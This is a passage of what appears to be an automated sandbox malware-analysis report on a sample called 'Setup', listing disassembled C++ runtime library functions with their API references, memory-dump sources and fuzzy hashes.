                                                                                                                                                                                                                                                      • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                      • API String ID: 2204710431-1686923651
                                                                                                                                                                                                                                                      • Opcode ID: 2c576ec62a8a33ab11a29e21a64e113a4309fa9f85fd6dbcb6d60874f7917b81
                                                                                                                                                                                                                                                      • Instruction ID: 27a173b24a5085423b1a8bbf5d797c0bfe7ea99080969f025d4c9da01e9f445f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c576ec62a8a33ab11a29e21a64e113a4309fa9f85fd6dbcb6d60874f7917b81
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F421B1B9904B456FDB26DF74C8807ABBAF8AB0D700F04491AE469DBA41D770E611CB90
                                                                                                                                                                                                                                                      Function 02D64B98 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                      • API String ID: 2204710431-1686923651
                                                                                                                                                                                                                                                      • Opcode ID: 10cb20a6054a2dce0b2ccfc42e3b46075c21c850481719e464cd3cbdc7863331
                                                                                                                                                                                                                                                      • Instruction ID: 7ef0578674c0ea09c844ad1d4a45af3f83b7ea908b5cf15ce3dd19b97e7896c4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10cb20a6054a2dce0b2ccfc42e3b46075c21c850481719e464cd3cbdc7863331
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90218BB1904A516FDB25DF64C884B7BBAF9EB09700F04495AE499C7B40D774EA41CFA0
                                                                                                                                                                                                                                                      Function 031B35E2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Maklocchr$H_prolog3_
                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                      • API String ID: 21007340-2658103896
                                                                                                                                                                                                                                                      • Opcode ID: f740cc078d84bba9320da8ff39381ca3b5ecc1765f132ebdaeee241e1ac88f94
                                                                                                                                                                                                                                                      • Instruction ID: 07216d2c79661bba55f9935045c4bf9cd26123ec003956ee5958e156bc5b7229
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f740cc078d84bba9320da8ff39381ca3b5ecc1765f132ebdaeee241e1ac88f94
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E213B79C00748AFDB14EFA9D84499FBBB8EF49700F00845AE915EF251EB70D540CBA0
                                                                                                                                                                                                                                                      Function 0319D780 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0319D7BC
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0319D7DE
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0319D806
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 0319D8EE
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0319D922
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                                                                                                                                      • Opcode ID: ecf55e2f3e3dac433c5daaf70fe22e4988efdc39d3d12cacc8d2ef3f46fea94d
                                                                                                                                                                                                                                                      • Instruction ID: e4b0e915bbb142afb88ec36f77892ee107a2dbe4be5eb50eca17f911ecd9b2df
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ecf55e2f3e3dac433c5daaf70fe22e4988efdc39d3d12cacc8d2ef3f46fea94d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6651BE74D00249DFDF10EFA8D548BAEBBB4FF48314F24419AD405AB392DB74AA45CB91
                                                                                                                                                                                                                                                      Function 02D4EF64 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D4EFA0
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D4EFC2
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D4EFEA
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D4F0D2
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D4F106
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                                                                                                                                      • Opcode ID: ed00afb262be88c3f7663a185d82658a320c47b90657c6cc087bd801e9aef877
                                                                                                                                                                                                                                                      • Instruction ID: 1f4a29556d257514ecd54018a06710f25fdd30c741baf017502044cb37072798
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed00afb262be88c3f7663a185d82658a320c47b90657c6cc087bd801e9aef877
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53517870900259DFDB11CFA8C9447AEBBB4EF94314F24416AD805AB390DBB5AE45CBA1
                                                                                                                                                                                                                                                      Function 0318A870 Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0318A8AD
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0318A8CF
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0318A8F7
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 0318A9F1
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0318AA25
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                                                                                                                                      • Opcode ID: beb4dcae067162e072cd82e4e72cac9d457abd5a16eb4616c5e97956a3b5b9b3
                                                                                                                                                                                                                                                      • Instruction ID: 55f1d48cff64936727e63c4fe3002b2aba92655f2a1f95e1b6ab940c267045c4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: beb4dcae067162e072cd82e4e72cac9d457abd5a16eb4616c5e97956a3b5b9b3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3519074D04649DFDB01EF98D5547AEBBB4FF48314F24805AC8166B381DB75AA06CF90
                                                                                                                                                                                                                                                      Function 0319D120 Relevance: 7.6, APIs: 5, Instructions: 131COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0319D15D
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0319D17F
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0319D1A7
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 0319D294
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0319D2C8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                                                                                                                                      • Opcode ID: ff8d9e3f4a14a65786206eb121906fa70e001e284d762703d6ed7d69ff79ac71
                                                                                                                                                                                                                                                      • Instruction ID: 3a9bd66ba7a42456cb5a63e5d70fba353b6735276b84158ebcedfb7e6ae7e212
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff8d9e3f4a14a65786206eb121906fa70e001e284d762703d6ed7d69ff79ac71
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B51AF75900249CFDF05DF98E548BAEBBB4FF48318F14809AD805AF381DB79AA05CB91
                                                                                                                                                                                                                                                      Function 02D4E904 Relevance: 7.6, APIs: 5, Instructions: 131COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D4E941
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D4E963
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D4E98B
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D4EA78
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D4EAAC
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 459529453-0
                                                                                                                                                                                                                                                      • Opcode ID: dfaf538290569dc05e644b8cb86ec61e43a05e182fe0bcf0b68eaafb67fe42ed
                                                                                                                                                                                                                                                      • Instruction ID: 1764e28a98e7a33f4f25828be2e0111dbed038580c9f27555de958b5ac3eff56
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dfaf538290569dc05e644b8cb86ec61e43a05e182fe0bcf0b68eaafb67fe42ed
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86517A70900259DFDF01CF99C9547AEBBB0FF44318F24816AC845AB380DBB9AE05CBA5
                                                                                                                                                                                                                                                      Function 031AA54C Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AA553
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AA55D
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AA604
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AA60F
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AA61C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: H_prolog3Lockitstd::_$Concurrency::cancel_current_taskLockit::_Lockit::~_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 845066630-0
                                                                                                                                                                                                                                                      • Opcode ID: d1871549148ff8acc7042477a67e84acf740e331568e37d00f621a8705387a39
                                                                                                                                                                                                                                                      • Instruction ID: 9ab6f01c8be1f98b270601b02fda36a31f11f32281ea9f935f92aca9c9541d8b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1871549148ff8acc7042477a67e84acf740e331568e37d00f621a8705387a39
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC317E39A00A1AAFCB08EF98C854AACB7B5FF0C751F448459D915AF290CB31EE40CF94
                                                                                                                                                                                                                                                      Function 02D5BD30 Relevance: 7.6, APIs: 5, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D5BD37
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D5BD41
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D5BDE8
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D5BDF3
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D5BE00
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: H_prolog3Lockitstd::_$Concurrency::cancel_current_taskLockit::_Lockit::~_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 845066630-0
                                                                                                                                                                                                                                                      • Opcode ID: 1278c62e2be01328abe0d5daedff56afb5df192ab029ccd6b1381350976716ef
                                                                                                                                                                                                                                                      • Instruction ID: b660e21d57f10f2a8d9cd6122485c6a87c8ce874267334fb8774a1a655e52a93
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1278c62e2be01328abe0d5daedff56afb5df192ab029ccd6b1381350976716ef
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91316D34A0062ADFDF04EF54C890AACB7B5FF04314F45845AE91AAB3A0CB71AD41CF94
                                                                                                                                                                                                                                                      Function 02D5BBEB Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D5BBF2
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D5BBFC
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D5BC4D
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D5BC6D
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D5BC7A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: e885901236ee3d20e9bf03ba2b5ae3083cb32e45f5f688de0d4d5f3c7b5cafa5
                                                                                                                                                                                                                                                      • Instruction ID: 9b36396cff51c03bea49ee308d7cc8f67c0c33df7c43b055942cc4fb4a259a98
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e885901236ee3d20e9bf03ba2b5ae3083cb32e45f5f688de0d4d5f3c7b5cafa5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9211D3719001399BCF14AB6899506FEBBA6EF94314F24401FEC14A7390DFB59D02CBE9
                                                                                                                                                                                                                                                      Function 031AA407 Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AA40E
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AA418
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AA469
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AA489
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AA496
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: c2679ac92845aaabeea5c2f318d2748f2f5e9013e1b166418640090b2e625900
                                                                                                                                                                                                                                                      • Instruction ID: 57cb9ad307f407a03fa057eaccf6a0e778aa2ae804a0f41f5579540ec05e125e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2679ac92845aaabeea5c2f318d2748f2f5e9013e1b166418640090b2e625900
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9801923D900B1A9BCB05EFA8D808ABEBBB6AF4C711F184409E4116F2D1DF349A45CB91
                                                                                                                                                                                                                                                      Function 031AF34A Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF351
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF35B
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF3AC
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF3CC
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF3D9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 8860d4a702386d7e47978fcea2e86fe36db3d8adacf91a39aa8aaa595dcfa00f
                                                                                                                                                                                                                                                      • Instruction ID: 8e78c20d9057ea3c78e52ca42c091afbd1622a5044dd703ab7509d6fd255c929
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8860d4a702386d7e47978fcea2e86fe36db3d8adacf91a39aa8aaa595dcfa00f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A01A13A9006199BCB05EBA8D8146BEBBB1AF4C711F180409D412AF290CF359A46C791
                                                                                                                                                                                                                                                      Function 031AF3DF Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031AF3E6
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031AF3F0
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031AF441
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031AF461
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031AF46E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: c991ecd3d7543c1f8b9156333f8d6688924b04eeb8bb2d396077801a91066243
                                                                                                                                                                                                                                                      • Instruction ID: b68c02205d1cb2e42597b606f2468d9862da7dd32c74f6a6cd47657ce104ee67
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c991ecd3d7543c1f8b9156333f8d6688924b04eeb8bb2d396077801a91066243
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C01D63E9046199FCB04FBA8DC44ABEB7B2AF4C721F184009E8116F2D0CF359E468B90
                                                                                                                                                                                                                                                      Function 031B0144 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031B014B
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031B0155
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031B01A6
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031B01C6
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031B01D3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 6bf2ac44ad3286a13c36eb4b0340827c2fb49f9d0ea300d973d7f20a10445285
                                                                                                                                                                                                                                                      • Instruction ID: 6627a8e2f7582ba2d5022ce7d7b998c59bc1267fac5d22a1c4480d0d80663772
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bf2ac44ad3286a13c36eb4b0340827c2fb49f9d0ea300d973d7f20a10445285
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D018039900719ABCB09EBA8D854AFEBBB6BF4C720F184009E4116F291CF74DA458B91
                                                                                                                                                                                                                                                      Function 031B001A Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031B0021
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 031B002B
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::_Lockit.LIBCPMT ref: 03177C65
                                                                                                                                                                                                                                                        • Part of subcall function 03177C30: std::_Lockit::~_Lockit.LIBCPMT ref: 03177C8F
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 031B007C
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 031B009C
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 031B00A9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: d272cd01acaedfe7fa5a1c4e29e67cb80c3a43ff26da97244c83a1210d4967d8
                                                                                                                                                                                                                                                      • Instruction ID: 44d3fc56395302bef5d58b4bad69279135d1a272d8f0e4823f14bd6982ed772b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d272cd01acaedfe7fa5a1c4e29e67cb80c3a43ff26da97244c83a1210d4967d8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB01D2399007199FCB04EBA8D844AFE7BB6BF8C760F180409E4116F2D1CF759A45CB90
                                                                                                                                                                                                                                                      Function 031B00AF Relevance: 7.5, APIs: 5, Instructions: 49COMMON
